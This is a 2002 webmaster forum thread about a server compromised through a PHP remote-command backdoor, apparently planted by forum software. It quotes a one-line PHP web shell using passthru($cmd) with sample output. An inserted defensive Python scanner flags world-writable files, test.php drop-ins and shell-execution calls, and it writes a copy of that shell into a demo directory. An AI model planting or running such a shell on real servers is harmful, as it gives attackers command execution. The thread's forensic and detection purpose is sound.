digitalghost

msg:1308285 | 6:12 am on Sep 24, 2002 (gmt 0) |
From the PHP exploit regarding the Apache hack: Suppose a malicious user wrote the following code: <? passthru($cmd); ?> And then, suppose also he typed the following URL with an enter key: [apache.org...] [7] Then you can see the following result: uid=203(dbai101) gid=201(dba)
|
veneerz

msg:1308286 | 6:20 am on Sep 24, 2002 (gmt 0) |
Hello digitalghost, thank you for the fast reply! Now, if you could please explain to the non-scripter, what does it mean in human language? :)
|
digitalghost

msg:1308287 | 6:30 am on Sep 24, 2002 (gmt 0) |
What it means is that someone can take advantage of configuration errors to execute remote shell commands by passing them as parameters to the PHP script. Then they gain local access with buffer overflow exploits or by uploading and compiling a bindshell. You can read much more about it here: [megasecurity.org...]
|
veneerz

msg:1308288 | 8:11 am on Sep 24, 2002 (gmt 0) |
Looks like that is exactly what has happened to me............. :( Now I have lots of police reports to write and lots of money to lose... Is there a way to find out who did this? Hostway says they delete all logs every Sunday. I found this entry in my .bash_history: <snip> I changed MySQL and Telnet passwords. Is there a way to find out if the trojan-like file is still resident on my server? [edited by: jatar_k at 5:44 pm (utc) on Sep. 24, 2002] [edit reason] removed specific info [/edit]
|
veneerz

msg:1308289 | 10:45 am on Sep 24, 2002 (gmt 0) |
I think I found out how I was hacked! What a sleepless night......... <some software company - no specifics, please> distributes their forum for free and installs a Trojan-like file on your server, which gives them access. Later they create a file or modify one of your PHP files, which gives them anonymous access.......... I need some sleep.......I hope I won't have PHP daymares...... [edited by: jatar_k at 4:14 pm (utc) on Sep. 24, 2002] [edited by: rcjordan at 6:47 pm (utc) on Sep. 24, 2002]
|
jatar_k

msg:1308290 | 4:42 pm on Sep 24, 2002 (gmt 0) |
Have you contacted them about this to see what they have to say? Can you substantiate the claim that the trojan-like file was preinstalled? Maybe someone wanders around looking for this particular forum software because they know how to exploit it. [edited by: jatar_k at 4:45 pm (utc) on Sep. 24, 2002]
|
rogerd

msg:1308291 | 4:45 pm on Sep 24, 2002 (gmt 0) |
OpenBB - seems like an on-target product name if the above report is accurate... :(
|
Key_Master

msg:1308292 | 5:17 pm on Sep 24, 2002 (gmt 0) |
veneerz, Considering the subject matter, you really shouldn't share your private server log info. You've just given out your site info and the pass key.
|
veneerz

msg:1308293 | 6:36 pm on Sep 24, 2002 (gmt 0) |
Key_Master, I already removed the entire forum software, reviewed my entire code, removed any suspicious script, changed all of my passwords, rearranged the root and set up a trap. Yeah, last night was a sleepless, learning one.
|
jatar_k

msg:1308294 | 7:06 pm on Sep 24, 2002 (gmt 0) |
veneerz, did you contact the company (who shall remain nameless)? Did they care? If they responded I would be interested in a paraphrase of their reply.
|
veneerz

msg:1308295 | 7:37 pm on Sep 24, 2002 (gmt 0) |
Hello jatar_k, I am 90% positive that this was the way they broke into our server. Instructions from the forum requested a chmod to 666 for one of the files. I was stupid enough not to trust them and not to check the code. But we all learn from our mistakes, and now I will have the dedication to learn PHP. You can never fully rely on your hosting tech support or even your web developer. You need to be able to fix everything by yourself! Here is another thing I learned last night: Hostway tech service is really bad. After I notified them about the breach, the best they could do was send me the FTP access stats, and only for the last 3 days. They told me that they delete them every 3 days and if I wanted more stats I would have to pay $100. I cannot be 100% definite that it is the forum software that opened a backdoor until I inspect their code, and it will take me at least two weeks, since I do not know PHP very well and will be examining it with a book and lots of online manuals. BUT! Problems started right after I installed the forum... Here is a lesson to be learned by all from my stupidity: do not download or install anything from anyone whom you do not trust. [edited by: jatar_k at 7:39 pm (utc) on Sep. 24, 2002] [edit reason] specifics [/edit]
|
veneerz

msg:1308296 | 7:44 pm on Sep 24, 2002 (gmt 0) |
jatar_k, I do not want to contact them yet. First I want to give all information to the police to investigate and come to their own conclusions. Who knows how many poor souls they might have been exploiting and people never even knew about it.
|
jatar_k

msg:1308297 | 7:44 pm on Sep 24, 2002 (gmt 0) |
>>do not download or install anything from anyone who you do not trust

Exactly. A basic working understanding of what is going on with everything running on your server/site is always a good plan. If, for any reason, you see anything strange, fix it, change it or find out more about it. Forum software is a tough one because it links into a lot of different parts of the server and usually has a lot of permissions to do many things. It also has thousands of lines of code that not many people can sift through and understand.
|
jatar_k

msg:1308298 | 7:45 pm on Sep 24, 2002 (gmt 0) |
veneerz, check your stickymail
|
veneerz

msg:1308299 | 9:01 pm on Sep 24, 2002 (gmt 0) |
Also I want to add something that I just read. Become extremely suspicious if you see a test.php or test1.php appear on your server. Most likely it was not created by your hosting company, but rather this file is created to gain access to your database.
|
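As an added example (not code from the thread or from any of the posters), here is a Python script a server admin could run over a document root to look for the three things the posts above describe: a PHP file left world-writable after a "chmod 666", a drop-in file named test.php or test1.php, and PHP code that passes a variable such as $cmd to passthru() or a similar shell function. The directory tree it builds is constructed for the demonstration, and the pattern matching is a heuristic assumption rather than a full code audit; a hit is a reason to inspect the file, not proof of compromise.

```python
# Added example (not from the thread): a defender-side scan of a web
# document root for the indicators the posts describe, namely PHP files
# left world-writable (the "chmod 666" instruction), drop-in files named
# test.php / test1.php, and PHP code that passes a variable (such as the
# $cmd in passthru($cmd)) to a shell-execution function. The directory
# layout built by build_sample_tree() is constructed for this demo and the
# regex heuristics are an assumption, not a complete audit.
import os
import re
import stat
import tempfile
from pathlib import Path

# PHP functions that hand their argument to a shell or spawn a process.
SHELL_CALL = re.compile(
    r"\b(passthru|system|exec|shell_exec|popen|proc_open)\s*\(\s*([^)]*)\)",
    re.IGNORECASE)
# Drop-in names the thread warns about (test.php, test1.php, ...).
SUSPICIOUS_NAME = re.compile(r"^test\d*\.php$", re.IGNORECASE)


def scan_docroot(root):
    """Return a list of (relative path, reason) findings for every *.php
    file below root. A clean tree yields an empty list."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*.php")):
        rel = path.relative_to(root).as_posix()
        mode = path.stat().st_mode
        if mode & stat.S_IWOTH:
            findings.append((rel, "world-writable (mode %o)" % stat.S_IMODE(mode)))
        if SUSPICIOUS_NAME.match(path.name):
            findings.append((rel, "suspicious drop-in filename"))
        text = path.read_text(errors="replace")
        for match in SHELL_CALL.finditer(text):
            func, arg = match.group(1), match.group(2).strip()
            # A literal string argument is a fixed command; a '$' means the
            # command comes from a variable, which under register_globals or
            # via $_GET/$_POST is attacker-controlled.
            if "$" in arg:
                findings.append((rel, f"{func}() called with variable argument: {arg}"))
    return findings


def build_sample_tree():
    """Create a constructed document root in a temp dir and return its path."""
    root = Path(tempfile.mkdtemp(prefix="docroot_"))
    (root / "forum").mkdir()
    (root / "lib").mkdir()
    # Clean page: no shell functions, normal permissions.
    index = root / "index.php"
    index.write_text("<?php echo 'Welcome'; ?>\n")
    os.chmod(index, 0o644)
    # Fixed command in a literal string: not flagged by the variable check.
    util = root / "lib" / "util.php"
    util.write_text("<?php system('date'); ?>\n")
    os.chmod(util, 0o644)
    # Forum config that the install notes told the admin to chmod 666.
    cfg = root / "forum" / "config.php"
    cfg.write_text("<?php $db_user = 'forum'; ?>\n")
    os.chmod(cfg, 0o666)
    # Dropped-in shell of the kind quoted in the thread (constructed copy).
    shell = root / "test.php"
    shell.write_text("<? passthru($cmd); ?>\n")
    os.chmod(shell, 0o644)
    return root


if __name__ == "__main__":
    for rel, reason in scan_docroot(build_sample_tree()):
        print(f"{rel}: {reason}")
```

Run as-is it prints three findings from the constructed tree (the 666 config file, and test.php twice: once for its name and once for passthru($cmd)); index.php and the literal system('date') call are left alone. To use it on a real server, point scan_docroot() at a copy of the document root and compare each flagged file against the forum package's original distribution before deleting anything, since the copy is what the police or the hosting company will want preserved.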
jdMorgan

msg:1308300 | 3:09 am on Sep 25, 2002 (gmt 0) |
veneerz, You should inform the police about the situation with the log files being deleted, and have the logs subpoenaed if possible. Also inform the hosting company that you need the logs to support a fraud investigation, and advise them strongly not to delete them (copy the investigator on this message). You should not have to pay for information needed to investigate criminal activity - the police can get it for free (well, they may have to get a search warrant). Jim
|